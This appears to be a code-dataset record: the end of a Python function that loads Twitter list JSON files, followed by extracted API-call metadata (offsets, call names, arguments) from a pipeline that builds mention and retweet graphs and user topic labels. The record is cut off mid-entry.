        path = json_folder + "/" + str(user_twitter_id) + ".json"
        with open(path, "r", encoding="utf-8") as f:
            twitter_lists = json.load(f)
        yield user_twitter_id, twitter_lists
| [
"networkx.to_scipy_sparse_matrix",
"reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv",
"numpy.ones",
"gc.collect",
"numpy.arange",
"reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix",
"reveal_user_annotation.twitter.manage_resources.get_reveal_set",
"reveal_user_anno... | [((1702, 1770), 'networkx.to_scipy_sparse_matrix', 'nx.to_scipy_sparse_matrix', (['sub_graph'], {'dtype': 'np.float64', 'format': '"""csr"""'}), "(sub_graph, dtype=np.float64, format='csr')\n", (1727, 1770), True, 'import networkx as nx\n'), ((2233, 2265), 'numpy.arange', 'np.arange', (['(0)', 'submatrix_row_size'], {}), '(0, submatrix_row_size)\n', (2242, 2265), True, 'import numpy as np\n'), ((2275, 2307), 'numpy.arange', 'np.arange', (['(0)', 'submatrix_col_size'], {}), '(0, submatrix_col_size)\n', (2284, 2307), True, 'import numpy as np\n'), ((3361, 3401), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['full_graph_folder'], {}), '(full_graph_folder)\n', (3382, 3401), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3406, 3458), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['weakly_connected_graph_folder'], {}), '(weakly_connected_graph_folder)\n', (3427, 3458), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3463, 3515), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['weakly_connected_label_folder'], {}), '(weakly_connected_label_folder)\n', (3484, 3515), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3520, 3564), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['implicit_graph_folder'], {}), '(implicit_graph_folder)\n', (3541, 3564), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3569, 3622), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['simple_undirected_graph_folder'], {}), '(simple_undirected_graph_folder)\n', 
(3590, 3622), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3627, 3685), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['combinatorial_implicit_graph_folder'], {}), '(combinatorial_implicit_graph_folder)\n', (3648, 3685), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3690, 3743), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['directed_implicit_graph_folder'], {}), '(directed_implicit_graph_folder)\n', (3711, 3743), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((4200, 4254), 'reveal_user_annotation.mongo.preprocess_data.extract_graphs_and_lemmas_from_tweets', 'extract_graphs_and_lemmas_from_tweets', (['tweet_generator'], {}), '(tweet_generator)\n', (4237, 4254), False, 'from reveal_user_annotation.mongo.preprocess_data import extract_graphs_and_lemmas_from_tweets, extract_connected_components\n'), ((4313, 4387), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/mention_graph' + '.pkl')", 'mention_graph'], {}), "(full_graph_folder + '/mention_graph' + '.pkl', mention_graph)\n", (4325, 4387), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4392, 4498), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/mention_graph' + '.tsv')", 'mention_graph', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/mention_graph' + '.tsv',\n mention_graph, '\\t', directed=True)\n", (4411, 4498), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4499, 4573), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', 
(["(full_graph_folder + '/retweet_graph' + '.pkl')", 'retweet_graph'], {}), "(full_graph_folder + '/retweet_graph' + '.pkl', retweet_graph)\n", (4511, 4573), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4578, 4684), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/retweet_graph' + '.tsv')", 'retweet_graph', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/retweet_graph' + '.tsv',\n retweet_graph, '\\t', directed=True)\n", (4597, 4684), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4685, 4771), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/user_lemma_matrix' + '.pkl')", 'user_lemma_matrix'], {}), "(full_graph_folder + '/user_lemma_matrix' + '.pkl',\n user_lemma_matrix)\n", (4697, 4771), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4772, 4886), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/user_lemma_matrix' + '.tsv')", 'user_lemma_matrix', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/user_lemma_matrix' + '.tsv',\n user_lemma_matrix, '\\t', directed=True)\n", (4791, 4886), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4887, 4959), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/tweet_id_set' + '.pkl')", 'tweet_id_set'], {}), "(full_graph_folder + '/tweet_id_set' + '.pkl', tweet_id_set)\n", (4899, 4959), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4964, 5034), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/user_id_set' + '.pkl')", 
'user_id_set'], {}), "(full_graph_folder + '/user_id_set' + '.pkl', user_id_set)\n", (4976, 5034), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5039, 5107), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/node_to_id' + '.pkl')", 'node_to_id'], {}), "(full_graph_folder + '/node_to_id' + '.pkl', node_to_id)\n", (5051, 5107), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5112, 5200), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/lemma_to_attribute' + '.pkl')", 'lemma_to_attribute'], {}), "(full_graph_folder + '/lemma_to_attribute' + '.pkl',\n lemma_to_attribute)\n", (5124, 5200), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5201, 5269), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/id_to_name' + '.pkl')", 'id_to_name'], {}), "(full_graph_folder + '/id_to_name' + '.pkl', id_to_name)\n", (5213, 5269), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5396, 5454), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/mention_graph' + '.pkl')"], {}), "(full_graph_folder + '/mention_graph' + '.pkl')\n", (5407, 5454), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5543, 5601), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/retweet_graph' + '.pkl')"], {}), "(full_graph_folder + '/retweet_graph' + '.pkl')\n", (5554, 5601), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5694, 5756), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/user_lemma_matrix' + '.pkl')"], {}), "(full_graph_folder + '/user_lemma_matrix' + '.pkl')\n", (5705, 5756), False, 'from 
reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5851, 5907), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/user_id_set' + '.pkl')"], {}), "(full_graph_folder + '/user_id_set' + '.pkl')\n", (5862, 5907), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5925, 5980), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/node_to_id' + '.pkl')"], {}), "(full_graph_folder + '/node_to_id' + '.pkl')\n", (5936, 5980), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((6635, 6674), 'numpy.array', 'np.array', (['old_node_list'], {'dtype': 'np.int64'}), '(old_node_list, dtype=np.int64)\n', (6643, 6674), True, 'import numpy as np\n'), ((7275, 7309), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['user_lemma_matrix'], {}), '(user_lemma_matrix)\n', (7290, 7309), True, 'import scipy.sparse as spsp\n'), ((7506, 7553), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_mention_graph'], {}), '(weakly_connected_mention_graph)\n', (7521, 7553), True, 'import scipy.sparse as spsp\n'), ((7591, 7638), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_retweet_graph'], {}), '(weakly_connected_retweet_graph)\n', (7606, 7638), True, 'import scipy.sparse as spsp\n'), ((7680, 7731), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_user_lemma_matrix'], {}), '(weakly_connected_user_lemma_matrix)\n', (7695, 7731), True, 'import scipy.sparse as spsp\n'), ((7772, 7912), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/mention_graph.tsv')", 'weakly_connected_mention_graph'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder + '/mention_graph.tsv',\n weakly_connected_mention_graph, separator='\\t', directed=True)\n", (7791, 7912), False, 'from 
reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((7986, 8126), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/retweet_graph.tsv')", 'weakly_connected_retweet_graph'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder + '/retweet_graph.tsv',\n weakly_connected_retweet_graph, separator='\\t', directed=True)\n", (8005, 8126), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((8200, 8353), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_graph_folder + '/user_lemma_matrix.tsv')", 'weakly_connected_user_lemma_matrix'], {'separator': '"""\t"""', 'directed': '(True)'}), "(weakly_connected_graph_folder +\n '/user_lemma_matrix.tsv', weakly_connected_user_lemma_matrix, separator\n ='\\t', directed=True)\n", (8219, 8353), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((8422, 8525), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_graph_folder + '/user_id_set' + '.pkl')", 'weakly_connected_user_id_set'], {}), "(weakly_connected_graph_folder + '/user_id_set' + '.pkl',\n weakly_connected_user_id_set)\n", (8434, 8525), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((8526, 8627), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_graph_folder + '/node_to_id' + '.pkl')", 'weakly_connected_node_to_id'], {}), "(weakly_connected_graph_folder + '/node_to_id' + '.pkl',\n weakly_connected_node_to_id)\n", (8538, 8627), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((8905, 9000), 
'reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix', 'read_adjacency_matrix', (["(weakly_connected_graph_folder + '/mention_graph.tsv')"], {'separator': '"""\t"""'}), "(weakly_connected_graph_folder + '/mention_graph.tsv',\n separator='\\t')\n", (8926, 9000), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((9017, 9112), 'reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix', 'read_adjacency_matrix', (["(weakly_connected_graph_folder + '/retweet_graph.tsv')"], {'separator': '"""\t"""'}), "(weakly_connected_graph_folder + '/retweet_graph.tsv',\n separator='\\t')\n", (9038, 9112), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((9788, 9936), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/mention_graph' + '.tsv')", 'simple_undirected_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/mention_graph' +\n '.tsv', simple_undirected_mention_graph, separator='\\t', directed=False)\n", (9807, 9936), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((10009, 10021), 'gc.collect', 'gc.collect', ([], {}), '()\n', (10019, 10021), False, 'import gc\n'), ((10261, 10409), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/retweet_graph' + '.tsv')", 'simple_undirected_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/retweet_graph' +\n '.tsv', simple_undirected_retweet_graph, separator='\\t', directed=False)\n", (10280, 10409), False, 'from reveal_graph_embedding.datautil.snow_datautil import 
read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((10482, 10494), 'gc.collect', 'gc.collect', ([], {}), '()\n', (10492, 10494), False, 'import gc\n'), ((11216, 11359), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(simple_undirected_graph_folder + '/men_ret_graph' + '.tsv')", 'simple_undirected_mr_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(simple_undirected_graph_folder + '/men_ret_graph' +\n '.tsv', simple_undirected_mr_graph, separator='\\t', directed=False)\n", (11235, 11359), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((11432, 11444), 'gc.collect', 'gc.collect', ([], {}), '()\n', (11442, 11444), False, 'import gc\n'), ((11832, 11900), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_combinatorial_laplacian', 'get_adjacency_matrix_via_combinatorial_laplacian', (['mention_graph', '(0.1)'], {}), '(mention_graph, 0.1)\n', (11880, 11900), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((12019, 12182), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/mention_graph' + '.tsv')", 'implicit_combinatorial_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/mention_graph' +\n '.tsv', implicit_combinatorial_mention_graph, separator='\\t', directed=\n False)\n", (12038, 12182), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((12250, 12262), 'gc.collect', 'gc.collect', ([], {}), '()\n', (12260, 12262), False, 'import gc\n'), ((12423, 12491), 
'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_combinatorial_laplacian', 'get_adjacency_matrix_via_combinatorial_laplacian', (['retweet_graph', '(0.1)'], {}), '(retweet_graph, 0.1)\n', (12471, 12491), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((12610, 12773), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/retweet_graph' + '.tsv')", 'implicit_combinatorial_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/retweet_graph' +\n '.tsv', implicit_combinatorial_retweet_graph, separator='\\t', directed=\n False)\n", (12629, 12773), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((12841, 12853), 'gc.collect', 'gc.collect', ([], {}), '()\n', (12851, 12853), False, 'import gc\n'), ((13831, 13894), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_directed_laplacian', 'get_adjacency_matrix_via_directed_laplacian', (['mention_graph', '(0.1)'], {}), '(mention_graph, 0.1)\n', (13874, 13894), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((14003, 14151), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/mention_graph' + '.tsv')", 'implicit_directed_mention_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/mention_graph' +\n '.tsv', implicit_directed_mention_graph, separator='\\t', directed=False)\n", 
(14022, 14151), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((14224, 14236), 'gc.collect', 'gc.collect', ([], {}), '()\n', (14234, 14236), False, 'import gc\n'), ((14382, 14445), 'reveal_user_classification.embedding.implicit.get_adjacency_matrix_via_directed_laplacian', 'get_adjacency_matrix_via_directed_laplacian', (['retweet_graph', '(0.1)'], {}), '(retweet_graph, 0.1)\n', (14425, 14445), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((14554, 14702), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/retweet_graph' + '.tsv')", 'implicit_directed_retweet_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/retweet_graph' +\n '.tsv', implicit_directed_retweet_graph, separator='\\t', directed=False)\n", (14573, 14702), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((14775, 14787), 'gc.collect', 'gc.collect', ([], {}), '()\n', (14785, 14787), False, 'import gc\n'), ((15704, 15801), 'reveal_user_classification.embedding.implicit.get_multiview_transition_matrix', 'get_multiview_transition_matrix', (['[mention_graph, retweet_graph]'], {'weights': 'None', 'method': '"""zhou"""'}), "([mention_graph, retweet_graph], weights=\n None, method='zhou')\n", (15735, 15801), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((16090, 16157), 
'reveal_user_classification.embedding.implicit.get_implicit_adjacency_matrices', 'get_implicit_adjacency_matrices', (['men_ret_transition_matrix'], {'rho': '(0.1)'}), '(men_ret_transition_matrix, rho=0.1)\n', (16121, 16157), False, 'from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian, get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices\n'), ((16241, 16404), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(combinatorial_implicit_graph_folder + '/men_ret_graph' + '.tsv')", 'implicit_combinatorial_men_ret_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(combinatorial_implicit_graph_folder + '/men_ret_graph' +\n '.tsv', implicit_combinatorial_men_ret_graph, separator='\\t', directed=\n False)\n", (16260, 16404), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((16472, 16620), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(directed_implicit_graph_folder + '/men_ret_graph' + '.tsv')", 'implicit_directed_men_ret_graph'], {'separator': '"""\t"""', 'directed': '(False)'}), "(directed_implicit_graph_folder + '/men_ret_graph' +\n '.tsv', implicit_directed_men_ret_graph, separator='\\t', directed=False)\n", (16491, 16620), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((16693, 16705), 'gc.collect', 'gc.collect', ([], {}), '()\n', (16703, 16705), False, 'import gc\n'), ((18435, 18503), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(weakly_connected_graph_folder + '/user_id_set' + '.pkl')"], {}), "(weakly_connected_graph_folder + '/user_id_set' + '.pkl')\n", (18446, 18503), False, 'from reveal_user_annotation.common.datarw import store_pickle, 
load_pickle\n'), ((18538, 18605), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(weakly_connected_graph_folder + '/node_to_id' + '.pkl')"], {}), "(weakly_connected_graph_folder + '/node_to_id' + '.pkl')\n", (18549, 18605), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((18623, 18678), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/id_to_name' + '.pkl')"], {}), "(full_graph_folder + '/id_to_name' + '.pkl')\n", (18634, 18678), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((18742, 18774), 'os.listdir', 'os.listdir', (['twitter_lists_folder'], {}), '(twitter_lists_folder)\n', (18752, 18774), False, 'import os\n'), ((18935, 18976), 'os.listdir', 'os.listdir', (['twitter_lists_keywords_folder'], {}), '(twitter_lists_keywords_folder)\n', (18945, 18976), False, 'import os\n'), ((21446, 21462), 'reveal_user_annotation.twitter.manage_resources.get_reveal_set', 'get_reveal_set', ([], {}), '()\n', (21460, 21462), False, 'from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary\n'), ((21488, 21518), 'reveal_user_annotation.twitter.manage_resources.get_topic_keyword_dictionary', 'get_topic_keyword_dictionary', ([], {}), '()\n', (21516, 21518), False, 'from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary\n'), ((22180, 22346), 'reveal_user_annotation.twitter.user_annotate.form_user_term_matrix', 'form_user_term_matrix', (['implicated_user_twitter_list_keywords_gen', 'weakly_connected_id_to_node'], {'lemma_set': 'lemma_set', 'keyword_to_topic_manual': 'keyword_topic_dict'}), '(implicated_user_twitter_list_keywords_gen,\n weakly_connected_id_to_node, lemma_set=lemma_set,\n keyword_to_topic_manual=keyword_topic_dict)\n', (22201, 22346), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, 
form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((22665, 22806), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_label_folder + '/unfiltered_user_label_matrix' + '.tsv')", 'user_label_matrix', '"""\t"""'], {'directed': '(True)'}), "(weakly_connected_label_folder +\n '/unfiltered_user_label_matrix' + '.tsv', user_label_matrix, '\\t',\n directed=True)\n", (22684, 22806), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((22875, 22980), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_annotated_nodes' + '.pkl')", 'annotated_nodes'], {}), "(weakly_connected_label_folder + '/unfiltered_annotated_nodes' +\n '.pkl', annotated_nodes)\n", (22887, 22980), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((22998, 23101), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_label_to_lemma' + '.pkl')", 'label_to_lemma'], {}), "(weakly_connected_label_folder + '/unfiltered_label_to_lemma' +\n '.pkl', label_to_lemma)\n", (23010, 23101), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((23119, 23250), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(weakly_connected_label_folder + '/unfiltered_node_to_lemma_tokeywordbag' +\n '.pkl')", 'node_to_lemma_tokeywordbag'], {}), "(weakly_connected_label_folder +\n '/unfiltered_node_to_lemma_tokeywordbag' + '.pkl',\n node_to_lemma_tokeywordbag)\n", (23131, 23250), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((23322, 23428), 'reveal_user_annotation.twitter.user_annotate.filter_user_term_matrix', 'filter_user_term_matrix', (['user_label_matrix', 'annotated_nodes', 'label_to_lemma'], 
{'max_number_of_labels': 'None'}), '(user_label_matrix, annotated_nodes, label_to_lemma,\n max_number_of_labels=None)\n', (23345, 23428), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((23701, 23770), 'reveal_user_annotation.twitter.user_annotate.form_lemma_tokeyword_map', 'form_lemma_tokeyword_map', (['annotated_nodes', 'node_to_lemma_tokeywordbag'], {}), '(annotated_nodes, node_to_lemma_tokeywordbag)\n', (23725, 23770), False, 'from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix\n'), ((23998, 24124), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(weakly_connected_label_folder + '/user_label_matrix' + '.tsv')", 'user_label_matrix', '"""\t"""'], {'directed': '(True)'}), "(weakly_connected_label_folder + '/user_label_matrix' +\n '.tsv', user_label_matrix, '\\t', directed=True)\n", (24017, 24124), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((24237, 24451), 'reveal_graph_embedding.datautil.snow_datautil.write_screen_name_to_topics', 'write_screen_name_to_topics', (["(weakly_connected_label_folder + '/user_name_to_topics' + '.tsv')", 'user_label_matrix', 'weakly_connected_node_to_id', 'id_to_name', 'label_to_lemma', 'lemma_to_keyword'], {'separator': '"""\t"""'}), "(weakly_connected_label_folder +\n '/user_name_to_topics' + '.tsv', user_label_matrix,\n weakly_connected_node_to_id, id_to_name, label_to_lemma,\n lemma_to_keyword, separator='\\t')\n", (24264, 24451), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((2079, 2103), 'numpy.ones', 'np.ones', (['matrix.shape[0]'], {}), '(matrix.shape[0])\n', (2086, 2103), True, 'import numpy as np\n'), ((2118, 2142), 
'numpy.ones', 'np.ones', (['matrix.shape[1]'], {}), '(matrix.shape[1])\n', (2125, 2142), True, 'import numpy as np\n'), ((5491, 5521), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['mention_graph'], {}), '(mention_graph)\n', (5506, 5521), True, 'import scipy.sparse as spsp\n'), ((5638, 5668), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['retweet_graph'], {}), '(retweet_graph)\n', (5653, 5668), True, 'import scipy.sparse as spsp\n'), ((5797, 5831), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['user_lemma_matrix'], {}), '(user_lemma_matrix)\n', (5812, 5831), True, 'import scipy.sparse as spsp\n'), ((6806, 6836), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['mention_graph'], {}), '(mention_graph)\n', (6821, 6836), True, 'import scipy.sparse as spsp\n'), ((7061, 7091), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['retweet_graph'], {}), '(retweet_graph)\n', (7076, 7091), True, 'import scipy.sparse as spsp\n'), ((9734, 9782), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_mention_graph'], {}), '(simple_undirected_mention_graph)\n', (9749, 9782), True, 'import scipy.sparse as spsp\n'), ((10207, 10255), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_retweet_graph'], {}), '(simple_undirected_retweet_graph)\n', (10222, 10255), True, 'import scipy.sparse as spsp\n'), ((11167, 11210), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['simple_undirected_mr_graph'], {}), '(simple_undirected_mr_graph)\n', (11182, 11210), True, 'import scipy.sparse as spsp\n'), ((11960, 12013), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_combinatorial_mention_graph'], {}), '(implicit_combinatorial_mention_graph)\n', (11975, 12013), True, 'import scipy.sparse as spsp\n'), ((12551, 12604), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_combinatorial_retweet_graph'], {}), '(implicit_combinatorial_retweet_graph)\n', (12566, 12604), True, 'import scipy.sparse as spsp\n'), ((13949, 13997), 'scipy.sparse.csr_matrix', 